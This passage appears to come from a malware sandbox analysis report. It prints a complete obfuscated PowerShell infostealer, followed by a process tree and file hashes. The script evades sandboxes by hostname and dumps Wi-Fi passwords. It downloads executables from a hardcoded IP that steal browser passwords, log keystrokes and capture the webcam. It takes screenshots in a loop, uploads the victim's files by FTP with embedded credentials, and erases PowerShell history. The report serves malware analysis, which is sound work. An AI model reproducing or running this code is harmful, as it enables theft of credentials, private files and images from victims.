($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'O'+'J'+'J'+'8'+'K'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'V'+'9'+'G'+'V'+'Y'+'L') { exit } if ($HNAME2023 -eq 'D'+'O'+'M'+'I'+'C'+'-'+'D'+'E'+'S'+'K'+'T'+'O'+'P') { exit } if ($HNAME2023 -eq 'E'+'A'+'8'+'C'+'2'+'E'+'2'+'A'+'-'+'D'+'0'+'1'+'7'+'-'+'4') { exit } if ($HNAME2023 -eq 'E'+'S'+'P'+'N'+'H'+'O'+'O'+'L') { exit } if ($HNAME2023 -eq 'G'+'A'+'N'+'G'+'I'+'S'+'T'+'A'+'N') { exit } if ($HNAME2023 -eq 'G'+'B'+'Q'+'H'+'U'+'R'+'C'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'A'+'F'+'P'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'X'+'N'+'N'+'I'+'I'+'E') { exit } if ($HNAME2023 -eq 'g'+'Y'+'y'+'Z'+'c'+'9'+'H'+'Z'+'C'+'Y'+'h'+'R'+'L'+'N'+'g') { exit } if ($HNAME2023 -eq 'J'+'B'+'Y'+'Q'+'T'+'Q'+'B'+'O') { exit } if ($HNAME2023 -eq 'J'+'E'+'R'+'R'+'Y'+'-'+'T'+'R'+'U'+'J'+'I'+'L'+'L'+'O') { exit } if ($HNAME2023 -eq 'J'+'O'+'H'+'N'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'J'+'U'+'D'+'E'+'S'+'-'+'D'+'O'+'J'+'O') { exit } if ($HNAME2023 -eq 'J'+'U'+'L'+'I'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'A'+'N'+'T'+'E'+'C'+'H'+'-'+'L'+'L'+'C') { exit } if ($HNAME2023 -eq 'L'+'I'+'S'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'O'+'U'+'I'+'S'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'U'+'C'+'A'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'M'+'I'+'K'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'N'+'E'+'T'+'T'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'E'+'L'+'E'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'X'+'G'+'K'+'K'+'Z'+'C') { exit } if ($HNAME2023 -eq 'P'+'a'+'u'+'l'+' '+'J'+'o'+'n'+'e'+'s') { exit } if ($HNAME2023 -eq 'P'+'C'+'-'+'D'+'A'+'N'+'I'+'E'+'L'+'E') { exit } if ($HNAME2023 -eq 'P'+'R'+'O'+'P'+'E'+'R'+'T'+'Y'+'-'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'Q'+'9'+'I'+'A'+'T'+'R'+'K'+'P'+'R'+'H') { exit } if ($HNAME2023 -eq 'Q'+'a'+'r'+'Z'+'h'+'r'+'d'+'B'+'p'+'j') { exit } if ($HNAME2023 -eq 'R'+'A'+'L'+'P'+'H'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'1') { exit } if ($HNAME2023 -eq 'S'+'t'+'e'+'v'+'e') { exit } if ($HNAME2023 -eq 'S'+'Y'+'K'+'G'+'U'+'I'+'D'+'E'+'-'+'W'+'S'+'1'+'7') { exit } if ($HNAME2023 -eq 'T'+'0'+'0'+'9'+'1'+'7') { exit } if ($HNAME2023 -eq 't'+'e'+'s'+'t'+'4'+'2') { exit } if ($HNAME2023 -eq 'T'+'I'+'Q'+'I'+'Y'+'L'+'A'+'9'+'T'+'W'+'5'+'M') { exit } if ($HNAME2023 -eq 'T'+'M'+'K'+'N'+'G'+'O'+'M'+'U') { exit } if ($HNAME2023 -eq 'T'+'V'+'M'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'V'+'O'+'N'+'R'+'A'+'H'+'E'+'L') { exit } if ($HNAME2023 -eq 'W'+'I'+'L'+'E'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'5'+'E'+'0'+'7'+'C'+'O'+'S'+'9'+'A'+'L'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'D'+'O'+'W'+'S'+'-'+'E'+'E'+'L'+'5'+'3'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'1'+'B'+'H'+'R'+'V'+'P'+'Q'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'2'+'2'+'U'+'R'+'J'+'I'+'B'+'V') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'3'+'F'+'F'+'2'+'I'+'9'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'5'+'J'+'7'+'5'+'D'+'T'+'H'+'H') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'6'+'T'+'U'+'I'+'H'+'N'+'7'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'8'+'M'+'A'+'E'+'I'+'8'+'E'+'4') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'9'+'I'+'O'+'7'+'5'+'S'+'V'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'A'+'M'+'7'+'6'+'H'+'P'+'K'+'2') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'0'+'3'+'L'+'9'+'C'+'E'+'O') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'M'+'S'+'M'+'D'+'8'+'M'+'E') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'U'+'A'+'O'+'K'+'G'+'G'+'1') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'K'+'7'+'V'+'I'+'K'+'4'+'F'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'Q'+'N'+'G'+'K'+'G'+'N'+'5'+'9') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'R'+'S'+'T'+'0'+'E'+'8'+'V'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'U'+'9'+'5'+'1'+'9'+'1'+'I'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'V'+'Q'+'H'+'8'+'6'+'L'+'5'+'D') { exit } if ($HNAME2023 -eq 'W'+'O'+'R'+'K') { exit } if ($HNAME2023 -eq 'X'+'C'+'6'+'4'+'Z'+'B') { exit } if ($HNAME2023 -eq 'X'+'G'+'N'+'S'+'V'+'O'+'D'+'U') { exit } if ($HNAME2023 -eq 'Z'+'E'+'L'+'J'+'A'+'V'+'A') { exit } if ($HNAME2023 -eq '3'+'C'+'E'+'C'+'E'+'F'+'C'+'8'+'3'+'8'+'0'+'6') { exit } if ($HNAME2023 -eq 'C'+'8'+'1'+'F'+'6'+'6'+'C'+'8'+'3'+'8'+'0'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'S'+'L'+'V'+'D'+'7'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'U'+'P'+'F'+'K'+'S'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'P'+'4'+'F'+'I'+'B'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'U'+'J'+'B'+'D'+'2'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'L'+'T'+'M'+'C'+'K'+'L'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'L'+'T'+'W'+'Y'+'Y'+'U') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'A'+'2'+'B'+'Y'+'3'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'B'+'D'+'J'+'J'+'0'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'X'+'P'+'5'+'Y'+'F'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'A'+'U'+'8'+'G'+'J'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'C'+'R'+'B'+'3'+'F'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Y'+'R'+'N'+'O'+'7'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'K'+'Q'+'N'+'D'+'S'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'C'+'N'+'D'+'J'+'W'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'S'+'N'+'L'+'F'+'Z'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'W'+'F'+'R'+'V'+'K'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'L'+'N'+'2'+'V'+'U'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'2'+'Y'+'P'+'F'+'I'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'A'+'0'+'F'+'N'+'V'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'9'+'O'+'A'+'R'+'K'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'5'+'X'+'G'+'G'+'X'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'H'+'U'+'H'+'O'+'T'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'4'+'A'+'C'+'U'+'C'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'N'+'D'+'M'+'I'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'C'+'N'+'6'+'M'+'I'+'O') { exit } if ($HNAME2023 -eq 'F'+'E'+'R'+'R'+'E'+'I'+'R'+'A'+'-'+'W'+'1'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'J'+'C'+'6'+'5'+'0'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'S'+'7'+'P'+'P'+'R'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'W'+'Q'+'5'+'F'+'U'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'H'+'H'+'S'+'Y'+'4'+'R') { exit } if ($HNAME2023 -eq 'A'+'R'+'T'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'0') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'3') { exit } if ($HNAME2023 -eq 'R'+'T'+'T'+'C'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'0'+'1') { exit } if ($HNAME2023 -eq 'A'+'N'+'N'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'H'+'E'+'A'+'F'+'X'+'H'+'S'+'8'+'9'+'7'+'3'+'9'+'8'+'0'+'7') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'F'+'A'+'Q'+'N'+'W'+'5'+'1'+'H'+'S'+'Q'+'0') { exit } cd \"$($env:APPDATA)\" $1=\"1\";$2=\"2\";$3=\"3\" $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation ; $whoami=hostname;mkdir \"Cred\($hey)$whoami\$1-Password-Cookies\";mkdir \"Cred\($hey)$whoami\$3-Files\";mkdir \"Cred\($hey)$whoami\$2-Credentials\" $PublicIP = Invoke-RestMethod -Uri \"http://ipinfo.io/json\" | Select-Object -ExpandProperty ip $Location = Invoke-RestMethod -Uri \"http://ipinfo.io/$PublicIP/json\" | Select-Object -ExpandProperty loc $ComputerName = $env:COMPUTERNAME $Username = $env:USERNAME $RAM = Get-CimInstance -Class Win32_PhysicalMemory | Measure-Object -Property Capacity -Sum | Select-Object -ExpandProperty Sum $RAM = $RAM / 1GB $KeyboardLanguage = (Get-WinUserLanguageList).LanguageTag $GPU = Get-CimInstance -Class Win32_VideoController | Select-Object -ExpandProperty Name $CPU = Get-CimInstance -Class Win32_Processor | Select-Object -ExpandProperty Name $MACAddresses = Get-NetAdapter -Physical | Select-Object -ExpandProperty MacAddress if ($MACAddresses.Count -eq 1) { $MACAddress = $MACAddresses } if ($MACAddresses.Count -gt 1) { $MACAddress = $MACAddresses[0] }else{ $MACAddress = \"MAC Address not found\" } $WIFI = (netsh wlan show profiles) | Select-String \"\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Out-String $OS = Get-CimInstance -ClassName Win32_OperatingSystem $OsName = $OS.Caption $OsBit = $OS.OSArchitecture $Data = \"Public IP: $PublicIP`nLocation: $Location`nComputer Name: $ComputerName`nUsername: $Username`nRAM: $RAM GB`nOS Name: $OsName`nOS Bit: $OsBit`nKeyboard Language: $KeyboardLanguage`nGPU: $GPU`nCPU: $CPU`nMAC Address: $MACAddress`nExtracted WIFI:`n$WIFI\" Add-Content -Path \"$env:APPDATA\Cred\($hey)$whoami\$2-Credentials\Credentials.txt\" -Value $Data cd \"$env:LOCALAPPDATA\";mkdir NewStream $EM4vvrrvMM4Eyvdr4M44E = New-Object System.Net.WebClient $EM4vvrrvMM4Eyvdr4M44E.DownloadFile(\"http://193.42.33.232/meokl/KK2023.zip\",\"$($env:LOCALAPPDATA)\NewStream\KK2023.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:LOCALAPPDATA)\NewStream\KK2023.zip\" \"$($env:LOCALAPPDATA)\NewStream\" cd \"$($env:LOCALAPPDATA)\NewStream\";start Lst.exe Start-Sleep -Seconds 17 Copy-Item -Path \"$($env:LOCALAPPDATA)\NewStream\IMP_Data\*\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\\\" cd \"$($env:APPDATA)\";$hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname;mkdir \"Cred\($hey)$whoami\$3-Files\Desktop\";mkdir \"Cred\($hey)$whoami\$3-Files\Downloads\" Get-Childitem \"$($env:USERPROFILE)\Desktop\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$3-Files\Desktop\" -Force Get-Childitem \"$($env:USERPROFILE)\Downloads\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$3-Files\Downloads\" -Force $y9rd4wMs4OEjv4JA2 = 'ftp://89.116.53.55/' $444Edrv4OdjMsMrE2y = 'u999382941' $Mvr444vEMyMrEErddMd = 'Test1234' $rrvM44E44ryvdMMMEdMv = \"$($env:APPDATA)\Cred\\\" $EM4vvrrvMM4Eyvdr4M44E.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd) $SrcEntries = Get-ChildItem $rrvM44E44ryvdMMMEdMv -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $vEd4rEvE4drEEr4ErM4Ev4ME = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $rEE4EE44v4dMrryMdErdE4v = $folder.Fullname -replace $vEd4rEvE4drEEr4ErM4Ev4ME,$y9rd4wMs4OEjv4JA2 $rEE4EE44v4dMrryMdErdE4v = $rEE4EE44v4dMrryMdErdE4v -replace '\\', '/' try { $EE44dErvEEdvdrvrE4rEMMvvM = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EE44dErvEEdvdrvrE4rEMMvvM.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EE44dErvEEdvdrvrE4rEMMvvM.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $EE44dErvEEdvdrvrE4rEMMvvM.GetResponse(); } catch [Net.WebException] { try { $EyM444EdrvEE4MEM4rrrvr = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EyM444EdrvEE4MEM4rrrvr.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EyM444EdrvEE4MEM4rrrvr.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $EyM444EdrvEE4MEM4rrrvr.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$y9rd4wMs4OEjv4JA2 $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $EM4vvrrvMM4Eyvdr4M44E.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Recurse -Force DEL \"$($env:APPDATA)\Cred\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\NewStream\*\" -Force -Recurse $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname cd \"$($env:APPDATA)\";mkdir Google-Update $EM4vvrrvMM4Eyvdr4M44E.DownloadFile(\"http://193.42.33.232/alheim/Confirm.zip\",\"$($env:APPDATA)\Google-Update\Confirm.zip\") Unzip \"$($env:APPDATA)\Google-Update\Confirm.zip\" \"$($env:APPDATA)\Google-Update\" cd \"$($env:APPDATA)\Google-Update\";.\Confirm.exe cd \"$($env:APPDATA)\";mkdir \"sharing\($hey)$whoami\Ss\";mkdir \"sharing\($hey)$whoami\KeyLogs\";mkdir log_d_information_889176 $EM4vvrrvMM4Eyvdr4M44E.DownloadFile(\"http://193.42.33.232/mrytr/MnMs.zip\",\"$($env:APPDATA)\log_d_information_889176\MnMs.zip\") Unzip \"$($env:APPDATA)\log_d_information_889176\MnMs.zip\" \"$($env:APPDATA)\log_d_information_889176\" [Reflection.Assembly]::LoadWithPartialName(\"S\"+\"y\"+\"s\"+\"t\"+\"e\"+\"m\"+\".\"+\"D\"+\"r\"+\"a\"+\"w\"+\"i\"+\"n\"+\"g\") function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose() } $count_web = (1+ $count_web).ToString('00') $count_sc = (1+ $count_sc).ToString('00') $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080) while ($true) { Start-Sleep -Seconds 600 screenshot $bounds \"$($env:APPDATA)\sharing\($hey)$whoami\Ss\screenshot$count_sc.png\" cd \"$($env:APPDATA)\log_d_information_889176\";.\MnMs.exe;Start-Sleep -Seconds 5;Copy-Item -Path \"dosya.bmp\" -Recurse -Destination \"$env:APPDATA\sharing\($hey)$whoami\Ss\webcam$count_web.bmp\" $y9rd4wMs4OEjv4JA2 = 'ftp://89.116.53.55/' $444Edrv4OdjMsMrE2y = 'u999382941' $Mvr444vEMyMrEErddMd = 'Test1234' $rrvM44E44ryvdMMMEdMv = \"$($env:APPDATA)\sharing\\\" $EM4vvrrvMM4Eyvdr4M44E.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd) $SrcEntries = Get-ChildItem $rrvM44E44ryvdMMMEdMv -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $vEd4rEvE4drEEr4ErM4Ev4ME = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $rEE4EE44v4dMrryMdErdE4v = $folder.Fullname -replace $vEd4rEvE4drEEr4ErM4Ev4ME,$y9rd4wMs4OEjv4JA2 $rEE4EE44v4dMrryMdErdE4v = $rEE4EE44v4dMrryMdErdE4v -replace '\\', '/' try { $EE44dErvEEdvdrvrE4rEMMvvM = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EE44dErvEEdvdrvrE4rEMMvvM.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EE44dErvEEdvdrvrE4rEMMvvM.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $EE44dErvEEdvdrvrE4rEMMvvM.GetResponse(); } catch [Net.WebException] { try { $EyM444EdrvEE4MEM4rrrvr = [System.Net.WebRequest]::Create($rEE4EE44v4dMrryMdErdE4v); $EyM444EdrvEE4MEM4rrrvr.Credentials = New-Object System.Net.NetworkCredential($444Edrv4OdjMsMrE2y,$Mvr444vEMyMrEErddMd); $EyM444EdrvEE4MEM4rrrvr.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $EyM444EdrvEE4MEM4rrrvr.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $rrvM44E44ryvdMMMEdMv -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$y9rd4wMs4OEjv4JA2 $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $EM4vvrrvMM4Eyvdr4M44E.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse DEL \"$env:APPDATA\sharing\($hey)$whoami\Ss\*\" -Force -Recurse } } }else{ DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse exit } } "3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"4⤵PID:1316
-
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"4⤵PID:672
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles4⤵PID:3988
-
C:\Users\Admin\AppData\Local\NewStream\Lst.exe"C:\Users\Admin\AppData\Local\NewStream\Lst.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Users\Admin\AppData\Local\NewStream\Lst.exe"C:\Users\Admin\AppData\Local\NewStream\Lst.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵PID:4712
-
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"4⤵PID:844
-
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"4⤵PID:2640
-
C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe"C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe"C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵PID:1552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass "cd \"$($env:APPDATA)\";$hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname;mkdir \"$($env:APPDATA)\sharing\($hey)$whoami\KeyLogs\""6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"7⤵PID:1412
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ed3c41d0ee936c39fb050d925d5a66ff
SHA1c66ccd0cff5a6bbd530ca11fe6cf961d0c18f9c0
SHA256368051acef3684c13182f28a2feb9e2a36c02f17d31b37bb5812679831e795d1
SHA512a5129201aa5e76b928d87cd21a0627530efa3c427a82ff150f1ebab3cd1ae85c4e36b77ad7886842f89bfbf493327b2b792ecf89ec4e8701f0d25f09795d33ab
-
Filesize
1KB
MD55becb3178d2998ccd6eb3d8213602ff0
SHA14f25233805573e47104fb1ed4b56cfc2da33236f
SHA256b5a531882b10a9820e08d011e8e3a1b5f4ccc838106a71ee367e204f67f32792
SHA5129240bd0e666b32cd15b80a319463d8194930474146d9806cd7ca6959b89343732c3f8f9965176f954c942a9276efebcdad0db674a2cd2ac519eb14c31adb9fc2
-
Filesize
8.2MB
MD5163d4e2d75f8ce6c838bab888bf9629c
SHA1fbbd9999d3078b4047b3282f186b4ee86e0a3cc7
SHA256b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
SHA5123c84749a048a0d4fc4bccad15a69d344a5287ae786482091172a395bbfeedf28e1e5957cec18991d08bf0d6561ef86ccd022ed0c95d96310b2ef750bb97fee24
-
Filesize
8.2MB
MD5163d4e2d75f8ce6c838bab888bf9629c
SHA1fbbd9999d3078b4047b3282f186b4ee86e0a3cc7
SHA256b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
SHA5123c84749a048a0d4fc4bccad15a69d344a5287ae786482091172a395bbfeedf28e1e5957cec18991d08bf0d6561ef86ccd022ed0c95d96310b2ef750bb97fee24
-
Filesize
8.2MB
MD5163d4e2d75f8ce6c838bab888bf9629c
SHA1fbbd9999d3078b4047b3282f186b4ee86e0a3cc7
SHA256b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
SHA5123c84749a048a0d4fc4bccad15a69d344a5287ae786482091172a395bbfeedf28e1e5957cec18991d08bf0d6561ef86ccd022ed0c95d96310b2ef750bb97fee24
-
Filesize
8.2MB
MD5163d4e2d75f8ce6c838bab888bf9629c
SHA1fbbd9999d3078b4047b3282f186b4ee86e0a3cc7
SHA256b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
